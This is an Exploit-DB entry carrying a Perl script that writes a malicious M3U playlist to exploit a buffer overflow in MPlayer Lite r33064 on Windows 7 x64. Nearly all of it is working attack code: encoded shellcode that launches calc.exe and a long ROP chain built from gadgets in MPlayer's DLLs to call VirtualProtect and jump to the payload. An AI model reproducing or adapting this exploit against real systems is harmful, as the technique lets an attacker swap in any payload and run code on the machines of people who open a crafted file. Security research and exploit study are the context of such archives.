MPlayer (r33064 Lite) - Local Buffer Overflow (ROP)

EDB-ID:

17124

CVE:

N/A


Author:

Nate_M

Type:

local


Platform:

Windows

Date:

2011-04-06


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/perl
#
# Exploit Title: Mplayer BOF + ROP Exploit
# Date: 04\05\2011
# Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
# Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# Version: Lite 33064
# Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
# CVE : None

use strict;
use warnings;
use IO::File;

print q
{
	BOF/ROP exploit created by Nate_M
	Now writing M3U file...

};

# windows/exec 			CMD=calc.exe
# x86/shikata_ga_nai 	size 227
# badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f'
my $shellcode =
"\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" .
"\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" .
"\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" .
"\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" .
"\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" .
"\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" .
"\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" .
"\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" .
"\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" .
"\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" .
"\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" .
"\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" .
"\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" .
"\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" .
"\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" .
"\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" .
"\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" .
"\xe8\x37\x55";

my $buf = "\x90" x 1000;
$buf .= $shellcode;
$buf .= "\x41" x (2368-length($buf));;
$buf .= "0000";						# VirtualProtect addr
$buf .= "1111";						# Return addr
$buf .= "2222";						# lpAddress
$buf .= "3333";						# dwsize
$buf .= "4444";						# flNewProtect
$buf .= "\x60\x63\x12\x6B";			# lpflOldProtect
$buf .= "\x41" x 76;
##### Begin ROP Chain, create anchor in memory #####
$buf .= pack('V',0x649ABC7B);		# PUSH ESP # POP EBX # POP ESI # RET	[avformat.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x6B0402A9);		# MOV EAX,EBX # POP EBX # RET			[avcodec.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
$buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
$buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
$buf .= pack('V',0x6AD79CAC);		# DEC EAX # RET			68				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
$buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
$buf .= pack('V',0x6AF1DCB5);		# XCHG EAX,ECX # RET					[avcodec.dll]
$buf .= pack('V',0x6AFA5EE9);		# MOV EAX,ECX # RET						[avcodec.dll]
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]

##### Find location of VirtualProtect() in kernel32.dll #####
$buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
$buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 2;	# INC EAX # RET			6B				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		D6				[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			D7				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1AE				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		35C				[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			35D				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		6BA				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		D74				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1AE8			[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		35D0			[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AF1DCB5);		# XCHG EAX,ECX # RET					[avcodec.dll]
$buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
$buf .= pack('V',0x6AE8F378);		# MOV EAX,DWORD PTR DS:[EAX] # RET		[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
$buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 12;	# DEC EAX # RET			5D				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		BA				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		174				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		2E8				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		5D0				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		BA0				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		1740			[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);		# INC EAX # RET			1741			[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		2E82			[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET						[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
$buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]

##### Find location of shellcode #####
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
$buf .= pack('V',0x6B0B79D2);		# MOV EAX,EDX # RET						[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
$buf .= pack('V',0x6AD5C728);		# ADD EAX,69 # RET		69				[avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 31;	# DEC EAX # RET			4A				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		94				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		128				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		250				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		4A0				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		940				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AD5130E);		# SUB EAX,EDX # RET						[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x649509B4);		# XCHG EAX,EBP # RET					[avformat.dll]
$buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]
$buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]

##### Find approx length of shellcode #####
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET							[avcodec.dll]

##### Set shellcode to read/write #####
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);		# XOR EAX,EAX # RET		0				[avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;	# INC EAX # RET			4				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		8				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		10				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		20				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6B0B4113);		# ADD EAX,EDX # RET		40				[avcodec.dll]
$buf .= pack('V',0x6B0B79D0);		# MOV EDX,EAX # MOV EAX,EDX # RET		[avcodec.dll]
$buf .= pack('V',0x6AFCD525);		# XCHG EAX,ESI # RET					[avcodec.dll]
$buf .= pack('V',0x6AE62D12);		# MOV DWORD PTR DS:[EAX],EDX # RET		[avcodec.dll]

##### And profit #####
$buf .= pack('V',0x6AD79CAC) x 16;	# DEC EAX # RET							[avcodec.dll]
$buf .= pack('V',0x6AD44B94);		# XCHG EAX,ESP # RET


$buf .= "\x41" x (5172-length($buf));;
$buf .= "\xff\xff\xff\xff";
$buf .= pack('V',0x64953AD6);		# ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
$buf .= "\x41" x 2000;


open(my $FILE,">Exploit.m3u") || die "**Error:\n$!\n";
print $FILE "http:// ".$buf;
close($FILE);
print "\tFile Created With Sucess\n\n";